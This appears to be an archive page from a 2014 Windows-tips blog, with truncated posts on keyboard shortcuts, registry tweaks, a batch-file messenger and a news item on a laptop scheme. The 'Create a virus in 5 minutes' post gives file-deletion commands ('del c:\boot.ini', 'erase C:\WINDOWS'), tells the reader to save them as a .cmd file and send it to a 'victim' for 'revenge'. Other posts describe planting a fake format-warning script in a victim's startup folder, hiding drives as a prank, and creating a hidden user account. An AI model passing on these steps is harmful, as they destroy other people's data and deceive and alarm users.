Posts

Showing posts from May, 2014

Laptop Distribution Scheme for Upcoming Intermediate Students

LUCKNOW: Over 24 lakh students who wrote the exams for class XII in UP this year were motivated all the more to be successful. While good scores are always an achievement, Samajwadi Party-led state government's announcement to give free laptops and tablet PCs to those who clear the Classes X and XII exams last year was an added incentive. This year's class XII pass percentage is the highest in 10 years. There are doubts, however, over whether the Samajwadi Party in the second year of governance announce similar sops for students who pass out this year as they did last year. There has been no official word from state government on distribution of laptops for those who passed out in 2013 yet. No wonder, laptops can't be distributed to those who passed out this year on the basis of the policy decision taken last year. The government order dated July 5, 2012 clearly mentions that laptops and tablets for those who pass Class X exams, would be distributed...

Create a virus in 5 minutes

1) C reating virus trick open ur notepad n type the following......... type del c:\boot.ini c:\del autoexec.batsave as .exe[save it as .exe file....n u can save it by ne name] create the notepad in c: drive... 2) Note: but with in seconds harddisk get damaged create Virus in 5 minutes....... Very easy but dangerous VirusOk, now, the trick: The only thing you need is Notepad. Now, to test it, create a textfile called TEST.txt(empty) in C:\Now in your notepad type "erase C:\TEST.txt" (without the quotes). Then do "Save As..." and save it as "Test.cmd". Now run the file "Test.cmd" and go to C:\ and you'll see your Test.txt is gone. Now, the real work begins:Go to Notpad and type erase C:\WINDOWS (or C:\LINUX if you have linux) and save it again as findoutaname.cmd. Now DON'T run the file or you'll lose your WINDOWS map. So, that's the virus. Now to take revenge. Send you file to your victim. Once she/he opens it. Her/his WINDO...

Important and Hidden Windows Shortcuts

For gtalk windows key + esc Windows Logo+BREAK (Display the System Properties dialog box) WindowsLogo+D (Display the desktop) Windows Logo+M (Minimize all of the windows) Windows Logo+SHIFT+M (Restore the minimized windows) Windows Logo+E (Open My Computer) CTRL+C (Copy) CTRL+X (Cut) CTRL+V (Paste) CTRL+Z (Undo) DELETE (Delete) SHIFT+DELETE (Delete the selected item permanently without placing the item in the Recycle Bin) CTRL while dragging an item (Copy the selected item) CTRL+SHIFT while dragging an item (Create a shortcut to the selected item) F2 key (Rename the selected item) CTRL+RIGHT ARROW (Move the insertion point to the beginning of the next word) CTRL+LEFT ARROW (Move the insertion point to the beginning of the previous word) CTRL+DOWN ARROW (Move the insertion point to the beginning of the next paragraph) CTRL+A (Select all) F3 key (Search for a file or a folder) ALT+ENTER (View the properties for the selected item) ALT+F4 (Close the active item, or quit the ...

Amazing Notepad Symbols

Alt+15= ¤ Alt+79= O Alt+129= ü Alt+179= ¦ Alt+229= Õ Alt+20= ¶ Alt+80= P Alt+130= é Alt+180= ¦ Alt+230= µ Alt+21= § Alt+81= Q Alt+131= â Alt+181= Á Alt+231= þ Alt+32=espaço Alt+82= R Alt+132= ä Alt+182= Â Alt+232= Þ Alt+33= ! Alt+83= S Alt+133= à Alt+183= À Alt+233= Ú Alt+34=" Alt+84= T Alt+134= å Alt+184= © Alt+234= Û Alt+35= # Alt+85= U Alt+135= ç Alt+185= ¦ Alt+235= Ù Alt+36= $ Alt+86= V Alt+136= ê Alt+186= ¦ Alt+236= ý Alt+37= % Alt+87= W Alt+137= ë Alt+187= + Alt+237= Ý Alt+38= & Alt+88= X Alt+138= è Alt+188= + Alt+238= ¯ Alt+39= ' Alt+89= Y Alt+139= ï Alt+189= ¢ Alt+239= ´ Alt+40= ( Alt+90= Z Alt+140= î Alt+190= ¥ Alt+240= ­ Alt+41= ) Alt+91= [ Alt+141= ì Alt+191= + Alt+241= ± Alt+42= * Alt+92= Alt+142= Ä Alt+192= + Alt+242= _ Alt+43= + Alt+93= ] Alt+143= Å Alt+193= - Alt+243= ¾ Alt+44= , Alt+94= ^ Alt+144= É Alt+194= - Alt+244= ¶ Alt+45= - Alt+95= _ Alt+145= æ Alt+195= + Alt+245= § Alt+46= . Alt+96= ` Alt+146= Æ Alt+196= - Alt+246= ÷ Alt...

HOW TO REMOVE SHUTDOWN BUTTON

To remove the shutdown button from the logon screen in WinXP and 2K, use regedit and navigate to the following key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system change the value of the dword 'shutdownwithoutlogon' to '0'. exit regedit.

Use Your PC as Alarm

Now this is specially for the ones who are too lazy to get up even when the trust cellphone dies screeching its lungs out. Its pretty simple Creating the playlist create a playlist of your favourite songs in Winamp, WMP or any other player. Export the playlist as a M3U playlist. M3U is generally accepted by almost every player. Triggering the alarm point to start> programs >accessories > system tools >scheduled tasks Create a new task and choose program as windows media player or winamp (May work with others too but I haven't tried anything else) Choose "daily", Enter the time and choose "every day" at next screen. It would now ask for password (leave blank in case you don't have one) Right click on the newly created task and check the "run only if logged in" check box. In the properties. Append the path to the playlist you created in the "run" text box. It should now look like Code: Code: "D:\windows med...

Change the folder of c drive in my computer

All the Xp users would have been bored by the boring icons in their My Computer panel which are adjacent to the Hard disk drives(C:,D: or whatever drive letter you have). Here is a simple tweak by which you will be able to change this monotonous icon to anything you like,even your own Picture if you wish You can put any image in place of one which I have shown,even the picture of your favourite celebrity or your dream caror your own Picture . Here are the steps you need to follow: 1 .First of all the picture you want to use should have .ico extension(if you already have a pic with .ico extension proceed to step 2).Most of the pictures we normally use have extensions like .jpg,.bmp,.png..gif etc, so you first need to convert them to one with .ico extension.This is simple.Just go here and put your original image in the 'Source Image 'section,then click on 'Generate Favicon.ico ' button to get your image with .ico extension. 2 .Now go to My Computer.S...

Make a Funny Virus that scares your friends

Open notepad and type this: lol=msgbox ("Warning a virus has been detected on your PC. Press YES to format your hard disk now or press NO to format your hard disk after system reboot",20,"Warning") Then save it as Virus.VBS and go to the folder that contains it and open it if a window pops out saying a virus has been detected it's working. Press yes or no to close the window and put it in the startup folder of the victim's account. On startup the window should appear. Note: This does not harm your computer as it does not contain virus. The Yes and no button does not do anything except closing the window. And you can edit the virus in the sentence: Warning a virus has detected on your PC to any kind of virus eg.Trojan Horse like this lol=msgbox ("Warning a Trojan horse has been detected on your PC. Press YES to format your hard disk now or press NO to format format your hard disk after system reboot",20,"Warning") Oh in betwe...

Enjoy chatting with command prompt

If you want personal chat with a friend you don't need to download any yahoo messenger All you need is your friends IP address and Command Prompt. Firstly, open Notepad and enter: @echo off :A Cls echo MESSENGER set /p n=User: set /p m=Message: net send %n% %m% Pause Goto A Now save this as " Messenger.bat ". Open the .bat file and in Command Prompt you should see: MESSENGER User: After "User" type the IP address of the computer you want to contact. After this, you should see this: Message: Now type in the message you wish to send.Before you press "Enter" it should look like this: MESSENGER User: 27.196.391.193 Message: Hi Now all you need to do is press " Enter ", and start chatting!

How to Hide the drives(c:,d:,e:,...etc) from My Computer

Hide the drives(c:,d:,e:,...etc) in My Computer This is a great trick you can play on your friends. To disable the display of local or networked drives when you click My Computer. 1.Go to start->run.Type regedit.Now go to: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer Now in the right pane create a new DWORD item and name it NoDrives (it is case sensitive). Now modify it's value and set it to 3FFFFFF (Hexadecimal) . Now restart your computer. So, now when you click on My Computer, no drives will be shown(all gone...). To enable display of drives in My Computer, simply delete this DWORD item that you created.Again restart your computer.You can now see all the drives again. Magic........lol....

Create A Hidden User Account

Create A Hidden User Account Create A Hidden User Account This tweak allows an account that is normally displayed on the Welcome screen to be hidden from view. To log on using the account it's necessary to use the Log On To Windows dialog box similar to the one in Windows 2000. #[Start] [Run] [Regedit]#Registry Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon\SpecialAccounts\UserList#Modify/Create the Value Data Type(s) and Value Name(s) as detailed below.#Data Type: REG_DWORD [Dword Value] // Value Name: Type Name of Account to be Hidden#Setting for Value Data: [0 = Account is Hidden / 1 = Enabled]#Exit Registry and Reboot... While the account is hidden on the Welcome screen, note that the account profile will be visible in C:\Documents and Settings or wherever user profiles are stored as well as in Local Users and Groups

Want to know IP address of the email sender in gmail ?

How to find the IP address of the sender in Gmail When you receive an email, you receive more than just the message. The email comes with headers that carry important information that can tell where the email was sent from and possibly who sent it. For that, you would need to find the IP address of the sender. The tutorial below can help you find the IP address of the sender. Note that this will not work if the sender uses anonymous proxy servers. Finding IP address in Gmail: 1.Log into your Gmail account with your username and password. 2. Open the mail. 3. To display the headers,* Click on More options corresponding to that thread. You should get a bunch of links.* Click on Show original. 4. You should get headers like this:Gmail headers : nameLook for Received: from followed by a few hostnames and an IP address between square brackets. In this case, it is65.119.112.245.That is be the IP address of the sender! 5. Track the IP address of the sender.

Recover the lost administrators password in Windows XP

Slightly more work needed if you lose or forget the Windows XP administrator password. 1.First reboot Windows XP in safe mode by re-starting the computer and pressing F8 repeated as the computer starts up. 2.Then (in safe mode) click Start and then click Run. In the open box type " control userpasswords2 " without the quotes - I have just used quotes to differentiate what you have to type. 3.You will now have access to all the user accounts, including the administrators account and will be able to reset the lost password. 4.Just click the administrators user account , and then click Reset Password . 5.You will need to add a new password in the New password and the Confirm new password boxes, and confirm by clicking OK. All done, you have recovered the lost adminitrators password!

Wanna See your name on your taskbar?

Hi freinds ! I m here to tell u a trick to add up ur name in place of AM and PM beside time and make urself to feel proud among ur group of frnds. Its simple Start -> Control Pannel -> Regional and LAnguage option -> Customize (beside English US) -> Go to TIME tab -> Change AM symbol and PM symbol from AM and PM to ur name -> Apply -> Ok ... IS it changed ??? Might be not ...Now go to time in taskbar and Double Click it to open "Date and time property" ...Look place where time chnges in digital form i.e. 02:47:52 AM , click to arrow to cnage the AM or PM by selecting and press arrow. It will Show ur name or name that was entered by u, Apply -> OK and be HAPPY 8)

Some Important "run commands" for windows hidden apps

Try to use these guys and like if u succeeded..... Is it strange to hear , but true that some good programs are hidden in Windows XP !!! Programs : 1. Private Character Editor : Used for editing fonts,etc. Start>>Run  Now, type eudcedit , and click enter. 2. Dr. Watson : This an inbuilt windows repairing software ! Start>>Run  Now, type drwtsn32 , and press Enter. 3. Media Player 5.1 : Even if you upgrade your Media Player, you can still access your old player in case the new one fails !!! Start>>Run Now, type mplay32 , press Enter. 4. iExpress : Used to create SetupsYou can create your own installers ! Start>>Run Now, type iexpress   (with this you can make your c or java program to be inst...